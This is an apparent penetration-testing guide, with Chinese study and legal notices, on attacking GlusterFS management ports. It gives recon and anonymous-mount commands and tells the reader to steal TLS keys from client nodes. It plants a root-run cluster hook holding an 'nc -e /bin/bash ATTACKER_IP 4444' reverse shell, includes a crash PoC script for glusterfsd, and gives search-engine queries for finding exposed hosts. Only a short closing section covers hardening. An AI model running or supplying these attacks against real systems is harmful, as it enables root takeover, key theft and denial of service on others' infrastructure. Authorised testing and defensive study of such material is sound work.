24007 - Glusterfs

💡 学习提示: 本文档介绍 24007-24008-24009-49152 - GlusterFS 的渗透测试方法,适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

信息收集

Install the client utilities on your attacking box:

sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu
  1. Peer discovery & health
## List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
  1. Volume reconnaissance
## Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
  1. Mount without privileges
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster

If mounting fails, check /var/log/glusterfs/<vol_name>-<uid>.log on the client side. Common issues are:

  • TLS enforcement (option transport.socket.ssl on)
  • Address based access control (option auth.allow <cidr>)

Certificate troubleshooting

Steal the following files from any authorised client node and place them in /etc/ssl/ (or the directory shown in the error log):

/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca

Known Vulnerabilities (2022-2025)

CVE Affected versions Impact Notes
CVE-2022-48340 10.0–10.4, 11.0 Use-after-free in dht_setxattr_mds_cbk reachable through the network Remote 拒绝服务 and probable 远程代码执行. Fixed in 10.4.1 / 11.1.
CVE-2023-26253 < 11.0 Out-of-bounds read in FUSE notify handler Remote crash via crafted FS operations; public PoC available.
CVE-2023-3775 < 10.5 / 11.1 Incorrect permission validation when mounting gluster_shared_storage Lets any unauthenticated client mount the admin volume – leads to priv-esc explained below.

Always check gluster --version on every node; heterogeneous clusters are common after partial upgrades.

Exploiting gluster_shared_storage (提权)

Even in recent versions many administrators leave the special gluster_shared_storage volume world-readable because it simplifies geo-replication. The volume contains cronjob templates that run with root on every node.

## 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

## 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

## 3. Wait until glusterd distributes the hook and executes it as root

If hooks/1/ is not present, look for /ss_bricks/ – the exact path may vary with the major version.

Denial-of-服务 PoC (CVE-2023-26253)

#!/usr/bin/env python3
## Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131",24007)) as s:
    s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
    s.send(p.get_buffer())

Running the script crashes glusterfsd < 11.0.

Hardening & Detection

  • Upgrade – current LTS is 11.1 (July 2025). All CVEs above are fixed.

  • Enable TLS for every brick:

    gluster volume set <vol> transport.socket.ssl on
gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem

  • Restrict clients with CIDR lists:

    gluster volume set <vol> auth.allow 10.0.0.0/24

  • Expose management port 24007 only on a private VLAN or through SSH tunnels.

  • Watch logs: tail -f /var/log/glusterfs/glusterd.log and configure audit-log feature (volume set <vol> features.audit-log on).

搜索引擎语法

FOFA

# FOFA 搜索语法
port="24007"

Shodan

# Shodan 搜索语法
port:24007

ZoomEye

# ZoomEye 搜索语法
port:24007

📖 参考资料